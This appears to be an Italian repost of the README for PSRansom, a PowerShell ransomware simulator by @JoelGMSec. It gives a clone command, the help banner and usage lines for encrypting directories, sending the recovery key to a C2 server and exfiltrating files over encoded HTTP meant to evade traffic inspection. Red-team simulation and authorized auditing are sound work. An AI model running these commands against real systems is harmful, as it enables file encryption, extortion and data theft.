
Simulatore di Ransomware PowerShell con Server C2

PSRansom è un simulatore di ransomware PowerShell con funzionalità di server C2. Questo strumento ti aiuta a simulare il processo di crittografia di un ransomware generico su qualsiasi sistema con PowerShell installato. Grazie al server C2 integrato, puoi esfiltrare file e ricevere informazioni dal client via HTTP.
Tutte le comunicazioni tra i due elementi sono crittografate o codificate per non essere rilevate dai meccanismi di ispezione del traffico, anche se in nessun momento viene utilizzato HTTPS.
Si consiglia di clonare l'intero repository o di scaricare il file zip. Puoi farlo eseguendo il seguente comando:
git clone https://github.com/JoelGMSec/PSRansom
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: This tool helps you simulate encryption process of a
generic ransomware in PowerShell with C2 capabilities
Usage: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port
Encrypt all files & sends recovery key to C2Server
Use -x to exfiltrate and decrypt files on C2Server
.\PSRansom.ps1 -d Directory -k RecoveryKey
Decrypt all files with recovery key string
Warning: All info will be sent to the C2Server without any encryption
You need previously generated recovery key to retrieve files
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
Questo progetto è concesso in licenza sotto la licenza GNU 3.0 - consulta il file LICENSE per maggiori dettagli.
Questo strumento è stato creato e progettato da zero da Joel Gámez Molina // @JoelGMSec
Questo software non offre alcun tipo di garanzia. Il suo uso è esclusivo per ambienti educativi e/o audit di sicurezza con il corrispondente consenso del cliente. Non sono responsabile per un uso improprio o per eventuali danni causati da esso.
Per maggiori informazioni, puoi trovarmi su Twitter come @JoelGMSec e sul mio blog darkbyte.net.
Puoi supportare il mio lavoro offrendomi un caffè: